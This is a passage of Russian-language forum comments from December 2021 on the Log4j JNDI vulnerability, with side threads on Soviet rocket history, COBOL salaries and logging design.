Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #47 |
143. Сообщение от john_erohin (?), 11-Дек-21, 13:10 | +/– | ![]() |
> все, абсолютно все приходилось изобретать с нуля | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #90 Ответы: #144 |
144. Сообщение от пох. (?), 11-Дек-21, 13:32 | –1 +/– | ![]() |
> да ладно. это фон Браун с камрадами изобретали с нуля. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #143 |
145. Сообщение от пох. (?), 11-Дек-21, 13:36 | +/– | ![]() |
> речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #113 |
146. Сообщение от а (?), 11-Дек-21, 15:26 | +/– | ![]() |
если всё руками делать, то можно и на С писать. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #93 |
147. Сообщение от Аноним (84), 11-Дек-21, 16:06 | +/– | ![]() |
Программистам на Коболе так и не стали платить заоблачные зарплаты | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #135 Ответы: #152 |
148. Сообщение от InuYasha (??), 11-Дек-21, 17:12 | +/– | ![]() |
Весь мир в труху, абсурд, коррупцию, хаос и скайнеты. ) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
149. Сообщение от Онаним (?), 11-Дек-21, 19:42 | +/– | ![]() |
Да тут не в языке дело. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #105 |
150. Сообщение от Онаним (?), 11-Дек-21, 19:42 | +/– | ![]() |
Это где-то около надувания щёк - посмотрите, как мы можем. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #105 |
151. Сообщение от Михрютка (ok), 12-Дек-21, 00:24 | +/– | ![]() |
будет врать-то. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #90 Ответы: #153, #160 |
152. Сообщение от _ (??), 12-Дек-21, 03:45 | +2 +/– | ![]() |
В России? Конечно не платят, откуда в ней софт на Коблое?!?! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #147 Ответы: #159, #163 |
153. Сообщение от n00by (ok), 12-Дек-21, 12:38 | –1 +/– | ![]() |
> не "не предвидел", а вывезли на старт недоработанную ракету. успеть к празднику | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #151 |
154. Сообщение от spanjokus (ok), 12-Дек-21, 17:13 | +/– | ![]() |
катастрофическая | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
155. Сообщение от morphe (?), 12-Дек-21, 22:11 | +/– | ![]() |
> весь прикол в том что оно вовсе не "userid" получало. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #101 |
156. Сообщение от Аноним (-), 13-Дек-21, 03:14 | +1 +/– | ![]() |
Вот уж действительно все плохо там у вас. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #138 |
157. Сообщение от Аноним (158), 13-Дек-21, 05:05 | +/– | ![]() |
Даже в Amazon S3 проявляется | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #40 |
158. Сообщение от Аноним (158), 13-Дек-21, 05:21 | +/– | ![]() |
При необходимости передавать в логгер помимо строки раннер для нужных запросов (попросту колбэк), который максимум вернёт мап с параметрами, которые нужно в плейсхолдеры подставить. Тогда логгер сможет сам решить — нужно ему этот раннер дёргать или нет. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #59 Ответы: #173 |
159. Сообщение от пох. (?), 13-Дек-21, 08:28 | –1 +/– | ![]() |
> В России? Конечно не платят, откуда в ней софт на Коблое?!?! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #152 |
160. Сообщение от пох. (?), 13-Дек-21, 08:35 | –1 +/– | ![]() |
> Мишин после этого, говорят, год от Бармина прятался, тот ему пообещал | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #151 Ответы: #168 |
161. Сообщение от Наме (?), 13-Дек-21, 10:24 | +/– | ![]() |
log4j всегда был индуским шлаком. Надо быть без башки, чтобы его использовать в проме. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
162. Сообщение от Наме (?), 13-Дек-21, 10:30 | +/– | ![]() |
А файрвол не? JNDI-запросы наружу это как-то вызывает вопросы, мягко скажем. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
163. Сообщение от Наме (?), 13-Дек-21, 10:32 | +/– | ![]() |
Облака медленные и данные из мэнфрейма перенести это как на луну в очередной раз слетать. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #152 |
164. Сообщение от Наме (?), 13-Дек-21, 11:10 | +/– | ![]() |
Нефига не правильно. В ответ на JNDI-запрос исполняющий код не должен грузить классы. Это уж совсем трэшак. Очередное пюре в духе "а ведь было бы не плохо, чтобы кофеварка ещё и траву косила". | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #87 |
165. Сообщение от Наме (?), 13-Дек-21, 11:15 | +/– | ![]() |
Есть JUL и его хватает для всего. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #67 |
166. Сообщение от Наме (?), 13-Дек-21, 11:15 | +/– | ![]() |
А не надо спрингом пользоваться. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #75 |
167. Сообщение от Наме (?), 13-Дек-21, 11:45 | +/– | ![]() |
Жаба саморефлексаная и полностью динамическая. Так что, можно, в общем-то, всё. Правда, пальцы сотрутся и глаза коростой покроются. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #42 |
168. Сообщение от Михрютка (ok), 13-Дек-21, 16:51 | +/– | ![]() |
вы что, знакомы с вопросом исключительно по пересказам товарища рабиновича? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #160 Ответы: #170 |
169.
Сообщение от shricke![]() | +1 +/– | ![]() |
В теории, если в java security настроено разрешение загрузки классов только из разрешенных папок, то exploit не должен сработать. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
170. Сообщение от пох. (?), 13-Дек-21, 17:39 | –1 +/– | ![]() |
Я знаком по пересказам людей, работавших в отрасли. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #168 Ответы: #172 |
171. Сообщение от Аноним (171), 13-Дек-21, 22:20 | +/– | ![]() |
А ведь скоро придет время, когда они додумаются прикрутить продвинутый искусственный интеллект к очередной помойке для логов, и тогда пелевинские "зенитные кодексы" из фантастики превратяться в когнитивно диссонирующую реальность. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #92 |
172. Сообщение от Михрютка (ok), 14-Дек-21, 01:19 | +/– | ![]() |
а я, дяденька, просто кратко вам пересказал доклад близко не бывавших рабино^Wчленов комиссии ЦК в составе Брежнева, Гречко, Устинова, Сербина и др. они видимо написали полную фигню, да? а близко не бывавший Янгель с теми, кто уцелел после взрыва, еще и техническую фигню написали в приложении #1. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #170 |
173. Сообщение от Онаним (?), 14-Дек-21, 07:18 | +/– | ![]() |
Как вариант. В PHP легко closure передать. В жабе не в курсе, далёк от. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #158 |
174. Сообщение от szt1980 (ok), 17-Дек-21, 00:02 | –1 +/– | ![]() |
А все потому, что не на растишке написан. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
175. Сообщение от Аноним (175), 27-Дек-21, 02:13 | +/– | ![]() |
Чё за поток сознания лол, иди таблеточки пропей | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #137 |
Архив | Удалить |
Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема |
Закладки на сайте Проследить за страницей |
Created 1996-2025 by Maxim Chirkov Добавить, Поддержать, Вебмастеру |